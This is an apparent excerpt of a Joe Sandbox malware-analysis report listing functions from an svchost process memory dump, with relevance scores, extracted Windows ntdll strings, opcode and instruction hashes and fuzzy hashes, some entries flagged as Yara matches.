                                • Opcode ID: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                • Instruction ID: 5f1bbe40d429d0cc9680e065787f1b3402d42bdfec66d537ad980fdef6b338d1
                                • Opcode Fuzzy Hash: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                • Instruction Fuzzy Hash: F031DA76200260EFC751EB99CC86F6AB7E8EF09724F1D0055E411CF291E670FD50DA65
                                Function 03C29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 0-1391187441
                                • Opcode ID: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                • Instruction ID: 2b16a97c4704c4ec8cd1ff08bf83539b0091b0c20610ef4143cc539dffe71925
                                • Opcode Fuzzy Hash: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                • Instruction Fuzzy Hash: A531C676600214EFCB11EB46CC85FDEBBB8EF45B24F154061E814EB291D770EE40DA60
                                Function 03C429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                Download Yara Rule
                                Strings
                                • HEAP[%wZ]: , xrefs: 03C43255
                                • HEAP: , xrefs: 03C43264
                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03C4327D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                • API String ID: 0-617086771
                                • Opcode ID: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                • Instruction ID: ce0f1ab0c6a743a4b228ae14fa2d8f55a5782e90b59ec8fce17d7081e1ac042b
                                • Opcode Fuzzy Hash: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                • Instruction Fuzzy Hash: A692BD75A042899FDB25CF69C4447AEBBF1FF48300F188499E89AEB391D735AA41CF50
                                Function 03C41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                • Instruction ID: 38ce2c485ea0a510c28118b3f0696cfbf5c255415c51d3909ce1cf0304c43fe1
                                • Opcode Fuzzy Hash: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                • Instruction Fuzzy Hash: 3C2230706006419FEB16DF29C499B7AFBF5EF02704F1A849AE455CF282D736EA81CB50
                                Function 03C40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                • Instruction ID: e100f5f71dd4729802482125215530a71f7aa6944b1c79e0738688a54b3ef17b
                                • Opcode Fuzzy Hash: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                • Instruction Fuzzy Hash: 77F1A735A40605DFEB25CF69C988B6AF7B5FB45300F1981A9E506DF381D730EA81CB90
                                Function 03C31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                Download Yara Rule
                                Strings
                                • HEAP[%wZ]: , xrefs: 03C31712
                                • HEAP: , xrefs: 03C31596
                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03C31728
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                • Instruction ID: 81af117f9f9163f8b94f2f0bc3c279220a7ae9097e3c39daacc4b00415e27fc9
                                • Opcode Fuzzy Hash: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                • Instruction Fuzzy Hash: 13E10F70A046419FDB29EF69C451BBABBF5EF4A304F1C845DE496CB245E734EA40CB50
                                Function 03C3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                • API String ID: 0-1145731471
                                • Opcode ID: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                • Instruction ID: 67316c3576ad3af2c8fb938c07dc30a641932aea88614c1fb25d343e6ccda35e
                                • Opcode Fuzzy Hash: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                • Instruction Fuzzy Hash: FAB19C7AA047849BDF25CF69C884BADB7B6EF45314F1A446AE851EB380D730ED40CB54
                                Function 03CB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                • Instruction ID: 94041acdff6d14fe0c3d5a504aaac7474ecee571b9407ffc202430004e9228ae
                                • Opcode Fuzzy Hash: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                • Instruction Fuzzy Hash: 7CB1AF7A604381AFD321DE95C884FABB7F8EB54710F150929FA40EB290D775ED44CB92
                                Function 03C56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $@
                                • API String ID: 0-1077428164
                                • Opcode ID: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                • Instruction ID: 9963b2846c285927d2aa408ff868429a502e28cf0ad00327ad05be377d3d1cce
                                • Opcode Fuzzy Hash: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                • Instruction Fuzzy Hash: 6AC280716083419FEB25CF25C884BABB7E5AF88744F09896EFD89CB240D734D984CB56
                                Function 03C2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                • Instruction ID: 437486ede257791e510f956bc82f24a55c1816bbb80050964aeae1dedba7d6db
                                • Opcode Fuzzy Hash: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                • Instruction Fuzzy Hash: B2A16A759012299BDB21EB24CC88BEAF7B8EB44714F0541E9E909EB250DB35AFC5CF50
                                Function 03CC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                • Instruction ID: 788c2d5aeef06ecedecd1d9d23ffc038318d47e1cd5879889e2ec6fe5b14cce8
                                • Opcode Fuzzy Hash: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                • Instruction Fuzzy Hash: 608198796283C0AFE311DB15D944B6AB7E8FF85750F09892DF980DB390DB38D9048B62
                                Function 00401160 Relevance: 4.0, Strings: 3, Instructions: 208COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !)s8$+/o$|
                                • API String ID: 0-3591734817
                                • Opcode ID: 42af332ff73424bc95b21ede53a5d548c7fa415e78d62ad4ed5f1e60e9d3b030
                                • Instruction ID: 5c1e801e70e87ea0f260f386aa5737f442cbe5bb2d1a291acb54903002bf8da1
                                • Opcode Fuzzy Hash: 42af332ff73424bc95b21ede53a5d548c7fa415e78d62ad4ed5f1e60e9d3b030
                                • Instruction Fuzzy Hash: BA71A071D106498BDF08CFA9D8401EEB771EFE4314F24826FD918BB390E7759A828B95
                                Function 03C6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: %$&$@
                                • API String ID: 0-1537733988
                                • Opcode ID: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                • Instruction ID: 74a7dcb003fdeec920b2ab11c5ad6dd90826de3c09bfbc7d1be4758b298fea5f
                                • Opcode Fuzzy Hash: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                • Instruction Fuzzy Hash: B171B1746087429FC714DF25C5C0A6BFBE9FF89618F24891DE49ACB251C731EA05CB92
                                Function 00402C44 Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D@$VUUU$gfff
                                • API String ID: 0-2700251919
                                • Opcode ID: 1410d38f0be2daf8728e409c4833e3cbccb24d1c79a5c92bc70b14e135f73191
                                • Instruction ID: f8792bd6d7dbcbe3cd1ad441ac9d984a576cb94f379ed3226844411ac1bc7b24
                                • Opcode Fuzzy Hash: 1410d38f0be2daf8728e409c4833e3cbccb24d1c79a5c92bc70b14e135f73191
                                • Instruction Fuzzy Hash: B4513A32A0014A4BDB18CD5DC9843DDB7A6EFE4304F288177C858FB3D1D6B89E058794
                                Function 00402C50 Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D@$VUUU$gfff
                                • API String ID: 0-2700251919
                                • Opcode ID: 517d0e1aaddbd9f29fb252aa7a675d0fae99ca18c20ab45f42128c7aab1118b0
                                • Instruction ID: 5e5d092db45c34666497b4bf04195cba8d861ed89dad42f14262ad0c1f232a32
                                • Opcode Fuzzy Hash: 517d0e1aaddbd9f29fb252aa7a675d0fae99ca18c20ab45f42128c7aab1118b0
                                • Instruction Fuzzy Hash: 03512832A0054A4BDB18CA5DC9843DDB7A6EFE4304F288276C858FB3D1D6B89E058794
                                Function 03D0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                • GlobalizationUserSettings, xrefs: 03D0B834
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03D0B82A
                                • TargetNtPath, xrefs: 03D0B82F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                • Instruction ID: 5e95eb2bdbfca965b4935152628dfb0b949ebdfd1cdde7e6dd6101aa6cb879cf
                                • Opcode Fuzzy Hash: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                • Instruction Fuzzy Hash: 5F617076D45229ABDB21DF54DC88BDAB7B8EF54B10F0101E6A908EB290C774DE84CF90
                                Function 03C2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03C8E6C6
                                • HEAP[%wZ]: , xrefs: 03C8E6A6
                                • HEAP: , xrefs: 03C8E6B3
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                • Instruction ID: 951c999233127f240e245bc3bd65afc6d00cdc77fe9c00f010a36a6227a3a770
                                • Opcode Fuzzy Hash: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                • Instruction Fuzzy Hash: A751C336604798EFD712EB68C844BAAFBF8EF05704F0900A9E951CF692D774EA50DB50
                                Function 03CDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03CDDC32
                                • HEAP[%wZ]: , xrefs: 03CDDC12
                                • HEAP: , xrefs: 03CDDC1F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                • API String ID: 0-3815128232
                                • Opcode ID: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                • Instruction ID: ca8eabd843401fdc74dafb188d45ee8cc12f48b773a8a72aafc308990ade9afd
                                • Opcode Fuzzy Hash: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                • Instruction Fuzzy Hash: A0514435904250AEE374DE2AC88C772B7E1DF45248F09888AF6D3CF285DA75E942DB60
                                Function 03C6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 03CA82E8
                                • Failed to reallocate the system dirs string !, xrefs: 03CA82D7
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 03CA82DE
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1783798831
                                • Opcode ID: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                • Instruction ID: 78c61bcc662049bfcdbdeb0d9ef0a11cb146565d0ef5fd3c0b6a8e0dd7cee46e
                                • Opcode Fuzzy Hash: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                • Instruction Fuzzy Hash: B94115B6500310ABC720FB28DC84B5BBBE8FF59750F05492AF988DB250E770E910DB91
                                Function 03C616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1B4A
                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03CA1B39
                                • LdrpAllocateTls, xrefs: 03CA1B40
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-4274184382
                                • Opcode ID: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                • Instruction ID: 7ef97095a0fa9db8470720eaf7932cbb88825973fec6e60cd8ca4d272fc351e0
                                • Opcode Fuzzy Hash: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                • Instruction Fuzzy Hash: 8541AC79A00609AFCB15DFA9D881BAEFBF5FF59714F098119E405EB300D774A900DB90
                                Function 03CEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                • PreferredUILanguages, xrefs: 03CEC212
                                • @, xrefs: 03CEC1F1
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03CEC1C5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                • API String ID: 0-2968386058
                                • Opcode ID: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                • Instruction ID: a0480f67736134208c97ac29797a3d7e9999c823cfa0305824c3019b0f3446a5
                                • Opcode Fuzzy Hash: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                • Instruction Fuzzy Hash: D0418D76E0020AEFDB11DAD4C885FEEB7B8AB14700F05806AE905FB290D774AA449B90
                                Function 03CC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                • API String ID: 0-1373925480
                                • Opcode ID: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                • Instruction ID: 6e10281a0cc84889dd7462a7e4249357277955806e16dccee929315d26c2113e
                                • Opcode Fuzzy Hash: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                • Instruction Fuzzy Hash: 694102759203C88BEB2ADBA6C860BADB7B8EF55340F19445ED841EF391D6359A01CB10
                                Function 03CB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03CB4888
                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CB4899
                                • LdrpCheckRedirection, xrefs: 03CB488F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-3154609507
                                • Opcode ID: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                • Instruction ID: a33894e1ba7e9c23f903982c4811032c8dd2345cf374c7cb96160e770f7ac5a4
                                • Opcode Fuzzy Hash: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                • Instruction Fuzzy Hash: 0141D7336087609FCB29CE6AD440AA6B7F9AF49650F090569EC58EB353D731DD00CB91
                                Function 03C633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • RtlCreateActivationContext, xrefs: 03CA29F9
                                • SXS: %s() passed the empty activation context data, xrefs: 03CA29FE
                                • Actx , xrefs: 03C633AC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                • Instruction ID: 03b72a08c182bb5336ff860b89f319b9103e72624536141364251502803ffbfa
                                • Opcode Fuzzy Hash: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                • Instruction Fuzzy Hash: 423144362003529FDB22DE58C8C4BAABBA4FB44714F098469EC05DF2A1CB30ED41CB90
                                Function 03C61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                Strings
                                • LdrpInitializeTls, xrefs: 03CA1A47
                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1A51
                                • DLL "%wZ" has TLS information at %p, xrefs: 03CA1A40
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-931879808
                                • Opcode ID: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                • Instruction ID: 8e18d4c532c18ac72847b7e34dc17a33451b7b2d9ac12bd43db9092cc4f8bb9a
                                • Opcode Fuzzy Hash: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                • Instruction Fuzzy Hash: 75310776A00200ABD720DB59D885F7AB7ADEB66759F0D0069F405EB280E770EE04A790
                                Function 03C71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                • @, xrefs: 03C712A5
                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03C7127B
                                • BuildLabEx, xrefs: 03C7130F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-3051831665
                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction ID: fe26cc9ad5032d75251f50edcf7d0ae56d1daffa60f2768b54bd8bc2efbd6819
                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction Fuzzy Hash: 3531CD76900619AFCB11EFA5CC48EEEBBBDEB84714F054421ED14EB260DB30DA059BA0
                                Function 03CB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 03CB2104
                                • LdrpInitializationFailure, xrefs: 03CB20FA
                                • Process initialization failed with status 0x%08lx, xrefs: 03CB20F3
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2986994758
                                • Opcode ID: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                • Instruction ID: 5c0f2f6bc7b6f7ce4dad8e31f31dd53dd44d5ff83605bc2ee087e4196543a361
                                • Opcode Fuzzy Hash: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                • Instruction Fuzzy Hash: E8F0283A640308BFEB24E60CDC02FD97768EB41B04F050464FA00EF281D2F0AA10EA90
                                Function 03C403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: #%u
                                • API String ID: 48624451-232158463
                                • Opcode ID: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                • Instruction ID: 1456d5bfc5b60d24ea47eff171b325440adcc5cda252498e2d8795ea1696fea7
                                • Opcode Fuzzy Hash: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                • Instruction Fuzzy Hash: 06715B76A002499FDB05DFA9D994BAEB7B8FF48304F164065E901EB251EB34EE01DB60
                                Function 03CD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
